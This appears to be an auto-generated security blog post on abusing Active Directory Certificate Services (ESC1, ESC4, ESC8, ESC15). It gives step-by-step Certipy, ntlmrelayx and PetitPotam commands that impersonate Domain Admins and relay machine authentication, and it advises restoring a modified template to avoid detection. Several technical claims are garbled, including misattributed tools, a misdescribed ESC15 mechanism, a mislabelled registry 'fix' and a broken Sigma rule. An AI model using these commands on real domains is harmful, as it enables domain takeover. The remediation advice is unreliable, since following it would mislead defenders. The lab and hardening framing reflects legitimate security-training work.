Listen to this Post

Introduction:
Active Directory Certificate Services (ADCS) is Microsoft’s PKI backbone for authentication, encryption, and digital signatures in Windows domains. However, misconfigured certificate templates and lax authorization policies turn ADCS into a silent privilege escalation highway, allowing low-privileged users to impersonate Domain Admins. This article dissects real-world ADCS attacks (ESC1, ESC4, ESC8, ESC15) and provides step-by-step exploitation and hardening commands based on the latest offensive security research.
Learning Objectives:
- Identify and exploit the four most dangerous ADCS misconfigurations (ESC1, ESC4, ESC8, ESC15) using Certipy and Netexec.
- Build a vulnerable ADCS lab to safely practice certificate template abuse and NTLM relay attacks.
- Apply remediation techniques, including template hardening, access control fixes, and HTTP-based enrollment protections.
You Should Know:
- Setting Up an ADCS Attack Lab: From Zero to Vulnerable
A controlled lab is essential for testing ADCS exploits. You need a Kali Linux attacker machine and a Windows Server with Active Directory and ADCS installed.
Step‑by‑step guide:
- Deploy Windows Server 2022 – Install AD DS (Domain Controller) and promote to a domain, e.g.,
lab.local. - Install ADCS – On the DC, add the Active Directory Certificate Services role with Certification Authority (CA) and Web Enrollment.
PowerShell as Administrator Install-WindowsFeature Adcs-Cert-Authority -IncludeManagementTools Install-AdcsCertificationAuthority -CAType EnterpriseRootCA -CommonName "LAB-CA" -HashAlgorithm SHA256 -Force Install-WindowsFeature Adcs-Web-Enrollment -IncludeManagementTools Install-AdcsWebEnrollment -Force
- Create vulnerable templates – Duplicate the “User” template, enable “Supply in the request” for ESC1, and set low enrollment rights for ESC4 later.
- Configure Kali – Install Certipy and Netexec:
sudo apt install python3-pip pip3 install certipy-ad pip3 install netexec
- Validate connectivity – Ensure Kali can resolve the domain controller (e.g.,
dc.lab.local).
- ESC1 – Enrollee‑Supplied Subject Abuse (Domain Admin by Template)
ESC1 occurs when a certificate template allows client authentication and the requester can specify an arbitrary Subject Alternative Name (SAN), effectively impersonating any user.
Step‑by‑step exploitation:
- Enumerate vulnerable templates using Certipy:
certipy find -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -dc-only
Look for templates with `Client Authentication` EKU, `Enrollee Supplies Subject` enabled, and low enrollment privileges.
- Request a certificate for a privileged account (e.g.,
Administrator):certipy req -u lowuser -p 'pass123' -target dc.lab.local -ca LAB-CA -template VULN_TEMPLATE -upn [email protected]
- Convert and authenticate – Use the obtained certificate to retrieve the NT hash or authenticate via Kerberos:
certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10
→ The command returns the NTLM hash of the impersonated user.
- Escalate: Use `psexec` or `wmiexec` with the hash for full domain compromise.
Remediation:
- Disable “Supply in the request” on all client authentication templates.
- Require manager approval or set `CA certificate manager approval` for high-value templates.
3. ESC4 – Template Hijacking (Re‑Abusing Write Permissions)
ESC4 exploits weak ACLs allowing a low-privileged user to modify a certificate template and then abuse it like ESC1.
Step‑by‑step guide:
- Identify writable templates – After running
certipy find, check for templates where your user has `Write` orFull Control:certipy find -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -stdout
- Modify the template – Add the `ENROLLEE_SUPPLIES_SUBJECT` flag and enable client authentication:
certipy template -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -template VULN_TEMPLATE -save-old -set ENROLLEE_SUPPLIES_SUBJECT=1 -set ClientAuthentication=1
- Exploit as ESC1 – Request a certificate for Domain Admin and authenticate.
- Restore the original template after the exercise to avoid detection.
Remediation:
- Audit template ACLs regularly. Only CA administrators should have write access.
- Use `dsacls` to check permissions:
dsacls "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local"
- ESC8 – NTLM Relay to ADCS Web Enrollment
ESC8 targets HTTP‑based enrollment endpoints. An attacker coerces a machine account to authenticate via NTLM and relays that authentication to the ADCS web interface to enroll a certificate for that machine.
Step‑by‑step guide:
- Start a relay listener with Netexec’s
ntlmrelayx:sudo ntlmrelayx.py -t http://dc.lab.local/certsrv/certfnsh.asp -smb2support --adcs
- Coerce authentication from a target machine (e.g., a domain-joined workstation) using a printer bug or PetitPotam:
python3 PetitPotam.py -d lab.local -u lowuser -p 'pass123' attacker_ip target_ip
- The relay listener captures the NTLM hash and automatically requests a certificate for the victim machine.
- Use the certificate to authenticate via Kerberos (S4U2Self) or to obtain the machine account’s NTLM hash:
certipy auth -pfx machine.pfx -dc-ip 192.168.1.10
- Result: Compromise of the machine account, often used to pivot or dump domain credentials.
Remediation:
- Disable NTLM on ADCS web enrollment servers (use Kerberos only).
- Enable HTTP to HTTPS redirection and Extended Protection for Authentication.
- Apply the patch for CVE-2024-49019 (see ESC15) and enforce SMB signing.
- ESC15 – Arbitrary Application Policy Injection in V1 Templates (CVE‑2024‑49019)
This recent vulnerability allows attackers to inject arbitrary application policies into legacy V1 certificate templates, effectively bypassing EKU restrictions and escalating privileges.
Step‑by‑step exploitation:
- Identify a V1 template (Schema version 1) that allows enrollment for low-privileged users.
- Use Certipy’s ESC15 module (if available; otherwise, a custom script) to add the `Client Authentication` EKU policy:
certipy template -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -template V1_TEMPLATE -set 'ApplicationPolicies'=1.3.6.1.5.5.7.3.2
- Enroll a certificate after the injection:
certipy req -u lowuser -p 'pass123' -target dc.lab.local -ca LAB-CA -template V1_TEMPLATE -upn [email protected]
- Authenticate using the obtained certificate to gain Domain Admin access.
Remediation:
- Apply Microsoft’s security update (CVE-2024-49019) on all ADCS servers.
- Migrate all V1 templates to V2 or higher. Disable any legacy templates not in use.
- Monitor for `4662` (ACL modifications) and `4887` (certificate template changes) in Windows event logs.
6. Hardening ADCS – Commands and Best Practices
Proactive hardening blocks most ESC attacks. Deploy these measures immediately.
Windows hardening commands:
- List all certificate templates and their security descriptors:
certutil -v -template | Select-String -Pattern "Template Name|CN=" -Context 0,5
- Remove dangerous permissions – Use `certutil` or ADSI Edit to delete `Enroll` rights from low-privileged groups on sensitive templates.
- Disable HTTP‑based enrollment endpoints:
Remove-WebSite -Name "CertSrv"
- Enable CA certificate manager approval for all client authentication templates:
certutil -setreg CA\AuditFilter 127
- Apply the patch for CVE-2024-49019 and reboot.
Linux/Kali detection commands:
- Scan for ESC1/ESC4 templates remotely:
certipy find -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -vulnerable
- Check for NTLM relay exposure – Use Netexec to test web enrollment endpoints:
nxc http https://dc.lab.local/certsrv/ -k
7. Continuous Monitoring & Incident Response
Even after hardening, monitor for certificate abuse.
Step‑by‑step detection:
- Enable ADCS auditing (Group Policy → Advanced Audit Policy → Audit Certification Services).
- Monitor Event IDs: 4886–4890 for certificate requests, 4887 for template changes, and 4768/4769 for Kerberos TGT/TGS anomalies.
- Use Splunk or Elastic with this Sigma rule for ESC1-like activity:
selection: EventID: 4886 Subject: "Enrollee Supplies Subject" RequestAttributes: "SAN"
- Automated response – Block the source IP and revoke any suspicious certificates using
certutil -revoke <serial>.
What Undercode Say:
- Key Takeaway 1: ADCS misconfigurations are among the most impactful privilege escalation vectors in Windows domains – they are silent, often unmonitored, and can yield Domain Admin within minutes.
- Key Takeaway 2: Tools like Certipy and Netexec have automated complex ESC attacks, making it essential for defenders to actively audit templates, enforce CA manager approval, and disable NTLM on enrollment endpoints.
Analysis: The ADCS attack surface remains widely underestimated. While Microsoft has patched specific CVEs (like ESC15), the underlying design issues – overly permissive templates, writable ACLs, and legacy HTTP endpoints – persist in thousands of enterprises. Offensive security teams must transition from point-in-time pentesting to continuous ADCS validation, integrating `certipy find` into weekly CI/CD pipelines for Active Directory. Defenders, in turn, need to treat ADCS as a Tier‑0 asset, applying the same rigorous controls as Domain Controllers. The coming years will see more attacks on PKI trust chains, including AI‑driven certificate abuse and cross‑forest relay techniques.
Prediction:
As Microsoft pushes passwordless authentication, ADCS will become an even juicier target. Attackers will shift from Kerberoasting to certificate‑based persistence, and we will see widespread exploitation of misconfigured cloud‑integrated CAs (e.g., with Azure AD). Defenders will adopt “Certificate Threat Hunting” as a dedicated discipline, and automated remediation platforms will emerge to instantly revoke suspicious certificates. The ESC playbook will expand beyond ESC20, likely targeting hybrid PKI and hardware security module misconfigurations.
▶️ Related Video (72% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Cylum Academy – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


